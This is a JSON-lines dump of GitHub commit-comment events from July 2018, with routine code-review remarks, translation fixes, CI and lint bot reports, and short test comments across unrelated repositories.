{"id":"7933030309","type":"CommitCommentEvent","actor":{"login":"trebmuh"},"repo":{"name":"phpmyadmin/phpmyadmin"},"payload":{"comment":{"id":29631219,"position":null,"line":null,"path":null,"commit_id":"2a7294a9329889656bc226b00ca5f71f3918f558","created_at":"2018-07-07T22:40:38Z","updated_at":"2018-07-07T22:40:38Z","author_association":"CONTRIBUTOR","body":"Indeed, this is right.\r\n\r\nAnyway, I've checked a [French dictionnary](https://fr.wiktionary.org/wiki/espace) but didn't read it all apparently, assuming that every different meaning of \"espace\" were masculine and I didn't read the first time that only the freaking typography meaning was feminine!\r\n\r\nIt should be fixed now. If not, feel free to change it as I'll off-the-web from tomorrow until august.\r\n"}},"created_at":"2018-07-07T22:40:38Z"}
{"id":"7933030892","type":"CommitCommentEvent","actor":{"login":"juniornff"},"repo":{"name":"juniornff/Digimon-Heroes"},"payload":{"comment":{"id":29631220,"position":null,"line":null,"path":null,"commit_id":"49397e99ffa958294b8d90b4d3af7c41655644a1","created_at":"2018-07-07T22:41:17Z","updated_at":"2018-07-07T22:41:17Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-07T22:41:17Z"}
{"id":"7933033084","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29631223,"position":null,"line":null,"path":null,"commit_id":"5b094330573bf9cfc7332948eb206acf06e98811","created_at":"2018-07-07T22:43:36Z","updated_at":"2018-07-07T22:43:36Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [different animation speed for altered and collapsed candy](https://trello.com/c/kIBB0Px6/11-different-animation-speed-for-altered-and-collapsed-candy)"}},"created_at":"2018-07-07T22:43:36Z"}
{"id":"7933033820","type":"CommitCommentEvent","actor":{"login":"pdvhc1"},"repo":{"name":"pdvhc1/file_share-application"},"payload":{"comment":{"id":29631225,"position":null,"line":null,"path":null,"commit_id":"e38869219e69233cb148dbdf5762e77003978d65","created_at":"2018-07-07T22:44:26Z","updated_at":"2018-07-07T22:44:26Z","author_association":"OWNER","body":"this project is in need of a login string in additional to the core application."}},"created_at":"2018-07-07T22:44:26Z"}
{"id":"7933034003","type":"CommitCommentEvent","actor":{"login":"polko14"},"repo":{"name":"polko14/pacman"},"payload":{"comment":{"id":29631226,"position":null,"line":null,"path":null,"commit_id":"7e422c9fb8d5450fc3f9b44b2a3387dcad38a03d","created_at":"2018-07-07T22:44:38Z","updated_at":"2018-07-07T22:44:38Z","author_association":"OWNER","body":"Adding .gitignore"}},"created_at":"2018-07-07T22:44:38Z"}
{"id":"7933034583","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29631229,"position":null,"line":null,"path":null,"commit_id":"9398125decabd5d95589bbb7b055fc94b15a3adb","created_at":"2018-07-07T22:45:15Z","updated_at":"2018-07-07T22:45:15Z","author_association":"COLLABORATOR","body":"Puzzle `327-60adc21c` discovered in   [`test/test_upgrades.rb`](  https://github.com/zold-io/zold/blob/master/test/test_upgrades.rb)   and submitted as #365. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-07T22:45:15Z"}
{"id":"7933034666","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29631232,"position":null,"line":null,"path":null,"commit_id":"9398125decabd5d95589bbb7b055fc94b15a3adb","created_at":"2018-07-07T22:45:19Z","updated_at":"2018-07-07T22:45:19Z","author_association":"COLLABORATOR","body":"Puzzle `327-2e6b0869` discovered in   [`test/test_upgrades.rb`](  https://github.com/zold-io/zold/blob/master/test/test_upgrades.rb)   and submitted as #366. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-07T22:45:19Z"}
{"id":"7933044092","type":"CommitCommentEvent","actor":{"login":"akramtexas"},"repo":{"name":"akramtexas/edgex-go"},"payload":{"comment":{"id":29631239,"position":null,"line":null,"path":null,"commit_id":"697920cbba4907b77273392ba00f3917e593ba9f","created_at":"2018-07-07T22:54:09Z","updated_at":"2018-07-07T22:54:09Z","author_association":"OWNER","body":"This change-set fixes a number of HTTP 405 (\"Method Not Allowed\") errors."}},"created_at":"2018-07-07T22:54:09Z"}
{"id":"7933049626","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29631244,"position":null,"line":null,"path":null,"commit_id":"a62472c4df2ab0176a1be35bfd2af36e6fcf5af1","created_at":"2018-07-07T22:59:53Z","updated_at":"2018-07-07T22:59:53Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 685](https://travis-ci.org/per1234/arduino-ci-script/builds/401320127) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00685-001-tsv"}},"created_at":"2018-07-07T22:59:53Z"}
{"id":"7933049732","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29631245,"position":null,"line":null,"path":null,"commit_id":"a62472c4df2ab0176a1be35bfd2af36e6fcf5af1","created_at":"2018-07-07T22:59:59Z","updated_at":"2018-07-07T22:59:59Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 685](https://travis-ci.org/per1234/arduino-ci-script/builds/401320127) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00685"}},"created_at":"2018-07-07T22:59:59Z"}
{"id":"7933051749","type":"CommitCommentEvent","actor":{"login":"raizam"},"repo":{"name":"rokups/Urho3D"},"payload":{"comment":{"id":29631256,"position":9,"line":167,"path":"Source/Urho3D/CSharp/Script/InstanceCache.cs","commit_id":"ab1b74474ab9647fcd930fee9dd01d8c3ff82452","created_at":"2018-07-07T23:01:35Z","updated_at":"2018-07-07T23:01:35Z","author_association":"NONE","body":"This is a common problem when working with bindings, it requires to copy arrays between managed/unmanaged"}},"created_at":"2018-07-07T23:01:35Z"}
{"id":"7933052701","type":"CommitCommentEvent","actor":{"login":"Putin12345"},"repo":{"name":"joric/pywallet"},"payload":{"comment":{"id":29631259,"position":215,"line":181,"path":"pywallet.py","commit_id":"2ea2590e187b138bc36aa5ba148ac12d5ba7fc14","created_at":"2018-07-07T23:02:30Z","updated_at":"2018-07-07T23:02:30Z","author_association":"NONE","body":"2ea2590e"}},"created_at":"2018-07-07T23:02:30Z"}
{"id":"7933053793","type":"CommitCommentEvent","actor":{"login":"Putin12345"},"repo":{"name":"joric/pywallet"},"payload":{"comment":{"id":29631260,"position":null,"line":null,"path":null,"commit_id":"2ea2590e187b138bc36aa5ba148ac12d5ba7fc14","created_at":"2018-07-07T23:03:37Z","updated_at":"2018-07-07T23:03:37Z","author_association":"NONE","body":"123"}},"created_at":"2018-07-07T23:03:37Z"}
{"id":"7933054202","type":"CommitCommentEvent","actor":{"login":"Putin12345"},"repo":{"name":"joric/pywallet"},"payload":{"comment":{"id":29631262,"position":45,"line":78,"path":"pywallet.py","commit_id":"2ea2590e187b138bc36aa5ba148ac12d5ba7fc14","created_at":"2018-07-07T23:04:08Z","updated_at":"2018-07-07T23:04:08Z","author_association":"NONE","body":"123"}},"created_at":"2018-07-07T23:04:08Z"}
{"id":"7933057587","type":"CommitCommentEvent","actor":{"login":"jlitz"},"repo":{"name":"iamadamdev/bypass-paywalls-firefox"},"payload":{"comment":{"id":29631266,"position":null,"line":null,"path":null,"commit_id":"d66bc0bbc4946f14a9dda15de3c65241bff1513d","created_at":"2018-07-07T23:07:41Z","updated_at":"2018-07-07T23:07:41Z","author_association":"NONE","body":"does not function on this link which is their prime http://www.businessinsider.com/clusterstock"}},"created_at":"2018-07-07T23:07:41Z"}
{"id":"7933059064","type":"CommitCommentEvent","actor":{"login":"dantuluri"},"repo":{"name":"thedch/traffic-light-classifier"},"payload":{"comment":{"id":29631269,"position":null,"line":null,"path":null,"commit_id":"31cfb4702d346b5b178c25784a26de65c6967581","created_at":"2018-07-07T23:09:20Z","updated_at":"2018-07-07T23:09:20Z","author_association":"NONE","body":"You're only using IMAGE_DIR_TEST, not IMAGE_DIR_TRAINING anywhere. What training are you doing?"}},"created_at":"2018-07-07T23:09:20Z"}
{"id":"7933059674","type":"CommitCommentEvent","actor":{"login":"miner34006"},"repo":{"name":"alexmustdie/PolyMusic"},"payload":{"comment":{"id":29631271,"position":26,"line":26,"path":"User.hpp","commit_id":"a00a8adbb70639c228eb7ae12f4dcd495d3bcb59","created_at":"2018-07-07T23:10:01Z","updated_at":"2018-07-07T23:10:01Z","author_association":"NONE","body":"Я бы все таки разбил на смысловые блоки :)"}},"created_at":"2018-07-07T23:10:01Z"}
{"id":"7933060069","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"BondarOleg98/GlobalLogic"},"payload":{"comment":{"id":29631272,"position":110,"line":110,"path":"02-P-Dev_Tools/short_path.c","commit_id":"6ae9a7edd6e3ee5440384c60811e90ff0634feba","created_at":"2018-07-07T23:10:27Z","updated_at":"2018-07-07T23:10:27Z","author_association":"NONE","body":"Imagine someone builds and runs it:\r\n![screenshot_2018-07-08_02-08-08](https://user-images.githubusercontent.com/16870636/42415351-f2e85d84-8253-11e8-8d99-c4e0b8e83076.png)\r\nArgument parsing logic should have been reworked _completely_"}},"created_at":"2018-07-07T23:10:27Z"}
{"id":"7933060950","type":"CommitCommentEvent","actor":{"login":"Clownacy"},"repo":{"name":"nxengine/nxengine-evo"},"payload":{"comment":{"id":29631273,"position":null,"line":null,"path":null,"commit_id":"d7c771ef3a7b35a03725dfedaa39e8df39c5039b","created_at":"2018-07-07T23:11:27Z","updated_at":"2018-07-07T23:11:27Z","author_association":"CONTRIBUTOR","body":"Thanks. I was bashing my head against a brick wall trying to figure this out myself."}},"created_at":"2018-07-07T23:11:27Z"}
{"id":"7933061014","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"BondarOleg98/GlobalLogic"},"payload":{"comment":{"id":29631274,"position":21,"line":21,"path":"02-P-Dev_Tools/Makefile","commit_id":"6ae9a7edd6e3ee5440384c60811e90ff0634feba","created_at":"2018-07-07T23:11:32Z","updated_at":"2018-07-07T23:11:32Z","author_association":"NONE","body":"Pay attention to blank lines at the end of file. They shouldn't be included in commits"}},"created_at":"2018-07-07T23:11:32Z"}
{"id":"7933062714","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29631277,"position":null,"line":null,"path":null,"commit_id":"07fe82c79f10986743e2201d794aa7855fcf818b","created_at":"2018-07-07T23:13:26Z","updated_at":"2018-07-07T23:13:26Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Optimize tutorial code](https://trello.com/c/Ii6h81Ae/9-optimize-tutorial-code)"}},"created_at":"2018-07-07T23:13:26Z"}
{"id":"7933067636","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29631281,"position":null,"line":null,"path":null,"commit_id":"7cf80f3f75ec8cfc354ca6f52700beb86e3757e2","created_at":"2018-07-07T23:18:50Z","updated_at":"2018-07-07T23:18:50Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Optimize tutorial code](https://trello.com/c/Ii6h81Ae/9-optimize-tutorial-code)"}},"created_at":"2018-07-07T23:18:50Z"}
{"id":"7933068188","type":"CommitCommentEvent","actor":{"login":"Clownacy"},"repo":{"name":"ekeeke/Genesis-Plus-GX"},"payload":{"comment":{"id":29631283,"position":null,"line":null,"path":null,"commit_id":"7af5a0cdf484b0d6534024d02e07eda16340a50f","created_at":"2018-07-07T23:19:18Z","updated_at":"2018-07-07T23:19:18Z","author_association":"CONTRIBUTOR","body":"Neither `__MINGW32__` or `__MINGW64__` seem to be defined for me, and I can't find anything about them being in Make online. I think they're just a C preprocessor thing."}},"created_at":"2018-07-07T23:19:18Z"}
{"id":"7933069908","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"BondarOleg98/GlobalLogic"},"payload":{"comment":{"id":29631285,"position":1,"line":1,"path":"02-P-Dev_Tools/algorithm_Lee.h","commit_id":"6ae9a7edd6e3ee5440384c60811e90ff0634feba","created_at":"2018-07-07T23:20:48Z","updated_at":"2018-07-07T23:20:48Z","author_association":"NONE","body":"Imagine someone would like to use your function in own project.\r\nProblems arise here:\r\n1.  The `algorithm_Lee()` is undocumented. It should include a top comment, describing what the function takes and what id does; what are the limitations\r\n2.  The `algorithm_Lee()` function is not self-contained. It produces needless output, etc..."}},"created_at":"2018-07-07T23:20:48Z"}
{"id":"7933078560","type":"CommitCommentEvent","actor":{"login":"kiLLeen"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29631295,"position":15,"line":39,"path":"Miners/ccminerx16r.ps1","commit_id":"7aedaa91958e7f5e01d435c219047d3c436baab9","created_at":"2018-07-07T23:28:57Z","updated_at":"2018-07-07T23:28:57Z","author_association":"NONE","body":"I actually have a faster version available in my working directory that I never pushed up. I may get around to that, although I changed the way it reports"}},"created_at":"2018-07-07T23:28:57Z"}
{"id":"7933082196","type":"CommitCommentEvent","actor":{"login":"dmcgiv"},"repo":{"name":"oracle/dotnet-db-samples"},"payload":{"comment":{"id":29631302,"position":null,"line":null,"path":null,"commit_id":"185d8b67ed8ae8ae3dc3a7c0ba6d76ab9bbcf7ce","created_at":"2018-07-07T23:32:47Z","updated_at":"2018-07-07T23:32:47Z","author_association":"NONE","body":"Odp.net 18????? Where is this?"}},"created_at":"2018-07-07T23:32:47Z"}
{"id":"7933083421","type":"CommitCommentEvent","actor":{"login":"Valeriy08"},"repo":{"name":"Valeriy08/lecture0"},"payload":{"comment":{"id":29631307,"position":null,"line":null,"path":null,"commit_id":"4d225abb291fae865350304b9788f252d67f7ada","created_at":"2018-07-07T23:34:12Z","updated_at":"2018-07-07T23:34:12Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-07T23:34:12Z"}
{"id":"7933087621","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"BondarOleg98/GlobalLogic"},"payload":{"comment":{"id":29631317,"position":19,"line":19,"path":"02-P-Dev_Tools/algorithm_Lee.c","commit_id":"6ae9a7edd6e3ee5440384c60811e90ff0634feba","created_at":"2018-07-07T23:39:01Z","updated_at":"2018-07-07T23:39:01Z","author_association":"NONE","body":"Better way of doing it: \r\n```C\r\nprintf(\"Enter ax, ay, bx, by (', '-separated): \");\r\nif (scanf(\"%d, %d, %d, %d\", &ax, &ay, &bx, &by)) goto scan_err;    // or use strsep()\r\n```"}},"created_at":"2018-07-07T23:39:01Z"}
{"id":"7933087679","type":"CommitCommentEvent","actor":{"login":"Gaming-Universe"},"repo":{"name":"MakeTheBrainHappy/ProjectEuler1"},"payload":{"comment":{"id":29631318,"position":null,"line":null,"path":null,"commit_id":"0fc7f75311ea13fd3c37ee54f190998c47c2c020","created_at":"2018-07-07T23:39:06Z","updated_at":"2018-07-07T23:39:06Z","author_association":"NONE","body":"Hi!!! You may know me as @UniverseOfGaming from Scratch, not many Scratchers do GitHub, you should do it on the front page.\r\n\r\n> Nice!\r\n\r\nPlease add notifications or emails about messages on Scratch on your device, thanks!"}},"created_at":"2018-07-07T23:39:06Z"}
{"id":"7933087747","type":"CommitCommentEvent","actor":{"login":"tony1104"},"repo":{"name":"ELECTROALL/PLC"},"payload":{"comment":{"id":29631319,"position":null,"line":null,"path":null,"commit_id":"cd2c83db57690ab23ac7c6b8e522d55a59a2e525","created_at":"2018-07-07T23:39:09Z","updated_at":"2018-07-07T23:39:09Z","author_association":"NONE","body":"Bueno"}},"created_at":"2018-07-07T23:39:09Z"}
{"id":"7933088878","type":"CommitCommentEvent","actor":{"login":"tony1104"},"repo":{"name":"ELECTROALL/PLC"},"payload":{"comment":{"id":29631320,"position":null,"line":null,"path":null,"commit_id":"cd2c83db57690ab23ac7c6b8e522d55a59a2e525","created_at":"2018-07-07T23:40:22Z","updated_at":"2018-07-07T23:40:22Z","author_association":"NONE","body":"Hi"}},"created_at":"2018-07-07T23:40:22Z"}
{"id":"7933089442","type":"CommitCommentEvent","actor":{"login":"marcelpaulo"},"repo":{"name":"rgburke/grv"},"payload":{"comment":{"id":29631322,"position":null,"line":null,"path":null,"commit_id":"5fd0cc8aa008496281f7f44854b9b7b9705f6ae6","created_at":"2018-07-07T23:41:03Z","updated_at":"2018-07-07T23:41:03Z","author_association":"NONE","body":"grv start-up is noticeably snappier after this !"}},"created_at":"2018-07-07T23:41:03Z"}
{"id":"7933090084","type":"CommitCommentEvent","actor":{"login":"tony1104"},"repo":{"name":"ELECTROALL/PLC"},"payload":{"comment":{"id":29631326,"position":null,"line":null,"path":null,"commit_id":"cd2c83db57690ab23ac7c6b8e522d55a59a2e525","created_at":"2018-07-07T23:41:47Z","updated_at":"2018-07-07T23:41:47Z","author_association":"NONE","body":"G"}},"created_at":"2018-07-07T23:41:47Z"}
{"id":"7933090531","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"BondarOleg98/GlobalLogic"},"payload":{"comment":{"id":29631329,"position":24,"line":24,"path":"02-P-Dev_Tools/short_path.c","commit_id":"6ae9a7edd6e3ee5440384c60811e90ff0634feba","created_at":"2018-07-07T23:42:18Z","updated_at":"2018-07-07T23:42:18Z","author_association":"NONE","body":"[What kernel coding style says on it](https://github.com/BondarOleg98/GlobalLogic/files/2173204/CodingStyle1.pdf)\r\n\r\n```C\r\nif (argc == 1) {\r\n ...\r\n}```"}},"created_at":"2018-07-07T23:42:18Z"}
{"id":"7933092078","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"BondarOleg98/GlobalLogic"},"payload":{"comment":{"id":29631333,"position":39,"line":39,"path":"02-P-Dev_Tools/short_path.c","commit_id":"6ae9a7edd6e3ee5440384c60811e90ff0634feba","created_at":"2018-07-07T23:44:14Z","updated_at":"2018-07-07T23:44:14Z","author_association":"NONE","body":"As it is error handler, it could be done simpler:\r\n`if (argc > 3) goto ...` or \r\n```C\r\nif (argc > 3)\r\n        goto ..\r\n```"}},"created_at":"2018-07-07T23:44:14Z"}
{"id":"7933093860","type":"CommitCommentEvent","actor":{"login":"thedch"},"repo":{"name":"thedch/traffic-light-classifier"},"payload":{"comment":{"id":29631340,"position":null,"line":null,"path":null,"commit_id":"31cfb4702d346b5b178c25784a26de65c6967581","created_at":"2018-07-07T23:46:12Z","updated_at":"2018-07-07T23:46:12Z","author_association":"OWNER","body":"Hi @dantuluri -- this isn't a neural net, so there isn't any training going on -- just traditional computer vision. It's been a while, so I'm honestly not sure why I created that variable. "}},"created_at":"2018-07-07T23:46:12Z"}
{"id":"7933094355","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"BondarOleg98/GlobalLogic"},"payload":{"comment":{"id":29631341,"position":111,"line":111,"path":"02-P-Dev_Tools/short_path.c","commit_id":"6ae9a7edd6e3ee5440384c60811e90ff0634feba","created_at":"2018-07-07T23:46:47Z","updated_at":"2018-07-07T23:46:47Z","author_association":"NONE","body":"`return 1` will work fine. But GNU coding standard says, if program returns non-zero exit code, it should use the `exit(ret_code);` function"}},"created_at":"2018-07-07T23:46:47Z"}
{"id":"7933095523","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29631342,"position":null,"line":null,"path":null,"commit_id":"ca2d4a2e971a806d2c70532c98aa0e28ccacef73","created_at":"2018-07-07T23:48:13Z","updated_at":"2018-07-07T23:48:13Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ca2d4a2e971a806d2c70532c98aa0e28ccacef73-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ca2d4a2e971a806d2c70532c98aa0e28ccacef73-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ca2d4a2e971a806d2c70532c98aa0e28ccacef73-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-07T23:48:13Z"}
{"id":"7933096781","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29631344,"position":null,"line":null,"path":null,"commit_id":"ca2d4a2e971a806d2c70532c98aa0e28ccacef73","created_at":"2018-07-07T23:49:41Z","updated_at":"2018-07-07T23:49:41Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ca2d4a2e971a806d2c70532c98aa0e28ccacef73-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-07T23:49:41Z"}
{"id":"7933097532","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"BondarOleg98/GlobalLogic"},"payload":{"comment":{"id":29631348,"position":87,"line":87,"path":"02-P-Dev_Tools/short_path.c","commit_id":"6ae9a7edd6e3ee5440384c60811e90ff0634feba","created_at":"2018-07-07T23:50:33Z","updated_at":"2018-07-07T23:50:33Z","author_association":"NONE","body":"How could you time it if the `algorithm_Lee()` reads input from user?\r\nEven if you redirect stdin from file, timings will include file read. Even the `scanf` could significantly influence timings for small N"}},"created_at":"2018-07-07T23:50:33Z"}
{"id":"7933098722","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"BondarOleg98/GlobalLogic"},"payload":{"comment":{"id":29631349,"position":11,"line":11,"path":"02-P-Dev_Tools/algorithm_Lee.c","commit_id":"6ae9a7edd6e3ee5440384c60811e90ff0634feba","created_at":"2018-07-07T23:51:58Z","updated_at":"2018-07-07T23:51:58Z","author_association":"NONE","body":"If it is contant, declare it with `const int` identifier"}},"created_at":"2018-07-07T23:51:58Z"}
{"id":"7933101570","type":"CommitCommentEvent","actor":{"login":"vcloud9ray"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29631352,"position":null,"line":null,"path":null,"commit_id":"896e3f4c1eace0c1ad3e3b472fa373e62d7cddb5","created_at":"2018-07-07T23:55:27Z","updated_at":"2018-07-07T23:55:27Z","author_association":"NONE","body":":+1:"}},"created_at":"2018-07-07T23:55:27Z"}
{"id":"7933103215","type":"CommitCommentEvent","actor":{"login":"x-tec2017"},"repo":{"name":"Pinacolada64/ImageBBS"},"payload":{"comment":{"id":29631356,"position":null,"line":null,"path":null,"commit_id":"69ec3d3316d958b615fffb3c3c8f25c9a9424397","created_at":"2018-07-07T23:57:01Z","updated_at":"2018-07-07T23:57:01Z","author_association":"NONE","body":"I don't want to stifle your creativity but I'm getting close to publishing\na new full installation version of 2.0 including all the mods we've\nincorporated so far. I believe many of the files you have may be obsolete\nby now. Maybe it would be good to wait for the release of the next\ngeneration so that whatever you're working on will be compatible. The\nreason for a new full installation version is necessary because trying to\nget up to date with what is out there in the way of fixes and mods is too\nconfusing. Even Darkstar and I have gotten out of sync so now I'm working\non bringing everything back together for standardization.\n\n\nOn Sat, Jul 7, 2018, 4:14 PM Ryan Sherwood <notifications@github.com> wrote:\n\n> Sure thing. I'm also experimenting with some additional features in +.CP\n> - see the v2-copier branch, if you'd like. Not ready for prime time, but\n> might be interesting?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Pinacolada64/ImageBBS/commit/69ec3d3316d958b615fffb3c3c8f25c9a9424397#commitcomment-29630813>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AganoUKdTpfNktXrrlPknPuz2dpMfd_aks5uERaUgaJpZM4VF-qz>\n> .\n>\n"}},"created_at":"2018-07-07T23:57:01Z"}
{"id":"7933104237","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"BondarOleg98/GlobalLogic"},"payload":{"comment":{"id":29631357,"position":57,"line":57,"path":"02-P-Dev_Tools/algorithm_Lee.c","commit_id":"6ae9a7edd6e3ee5440384c60811e90ff0634feba","created_at":"2018-07-07T23:57:58Z","updated_at":"2018-07-07T23:57:58Z","author_association":"NONE","body":"If it's an error (and it is), the function should return error code.\r\nAlso `exit(0)` means all ok.\r\n\r\nSo: \r\n```C\r\nextern enum lee_errors {\r\n    ERR_BLANK;\r\n}\r\nenum lee_errors algorithm_Lee(int height, int width, int **table, int *px, int *py)\r\n{\r\n    ...\r\n    if (table[by][bx] == blank) return ERR_BLANK;\r\n    ...\r\n}\r\n```"}},"created_at":"2018-07-07T23:57:58Z"}
{"id":"7933105863","type":"CommitCommentEvent","actor":{"login":"wwtalwtaw"},"repo":{"name":"yd-yin/Deep_Learning"},"payload":{"comment":{"id":29631358,"position":null,"line":null,"path":null,"commit_id":"ab0d84d07b27c6a81175767bae54deb1881cc2d7","created_at":"2018-07-07T23:59:47Z","updated_at":"2018-07-07T23:59:47Z","author_association":"NONE","body":"代码写得不错，挺好的"}},"created_at":"2018-07-07T23:59:47Z"}
{"id":"7933105916","type":"CommitCommentEvent","actor":{"login":"Daniel4rt"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29631359,"position":5,"line":229,"path":"src/map/log.cpp","commit_id":"91169d7ebccccaf5008076383c89ff3a6c514a9e","created_at":"2018-07-07T23:59:50Z","updated_at":"2018-07-07T23:59:50Z","author_association":"NONE","body":"map[m].name[0] ? map[m].name\r\n\r\nor\r\n\r\nmap[m].name[0] ? map[m].name[0]\r\n\r\n???"}},"created_at":"2018-07-07T23:59:50Z"}
{"id":"7931650324","type":"CommitCommentEvent","actor":{"login":"yiTian66"},"repo":{"name":"yiTian66/hello-world"},"payload":{"comment":{"id":29628109,"position":null,"line":null,"path":null,"commit_id":"9070a185bac4e1832885f633ad13771366fd5502","created_at":"2018-07-07T03:01:13Z","updated_at":"2018-07-07T03:01:13Z","author_association":"OWNER","body":"什么玩意啊啊"}},"created_at":"2018-07-07T03:01:13Z"}
{"id":"7931657303","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"HenrikBengtsson/doFuture"},"payload":{"comment":{"id":29628131,"position":null,"line":null,"path":null,"commit_id":"3b854aca811c9fce3fd05b3d9e1c2cb771a2926b","created_at":"2018-07-07T03:07:20Z","updated_at":"2018-07-07T03:07:20Z","author_association":"NONE","body":"[inst/tests2/caret/examples.R:5:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/caret/examples.R#L5) *style:* **Lines should not be more than 80 characters.**\n```r\n​  install_missing_packages(c(\"class\", \"cluster\", \"e1071\", \"earth\", \"fastICA\", \"foreign\", \"gam\", \"klaR\", \"lattice\", \"MASS\", \"Matrix\", \"mboost\", \"mda\", \"mlbench\", \"MLmetrics\", \"nlme\", \"nnet\", \"pls\", \"proxy\", \"randomForest\", \"rpart\", \"survival\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/caret/examples.R:6:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/caret/examples.R#L6) *style:* **Lines should not be more than 80 characters.**\n```r\n​  ## install_missing_packages(c(\"ddalpha\", \"dimRed\", \"ipred\", \"ggplot2\", \"recipes\"))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests2/caret/examples.R:58:67:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/caret/examples.R#L58) *style:* **Trailing whitespace is superfluous.**\n```r\n​##   Error in e$fun(obj, substitute(ex), parent.frame(), e$data) : \n                                                                  ^\n```\n[inst/tests2/caret/examples.R:88:48:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/caret/examples.R#L88) *style:* **Trailing whitespace is superfluous.**\n```r\n​    ## Error in qda.default(x, grouping, ...) : \n                                               ^\n```\n[inst/tests2/caret/examples.R:93:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/inst/tests2/caret/examples.R#L93) *style:* **Variable or function name should be snake_case.**\n```r\n​    run.dontrun <- !is.element(topic, c(\"calibration\", excl_dontrun))\n    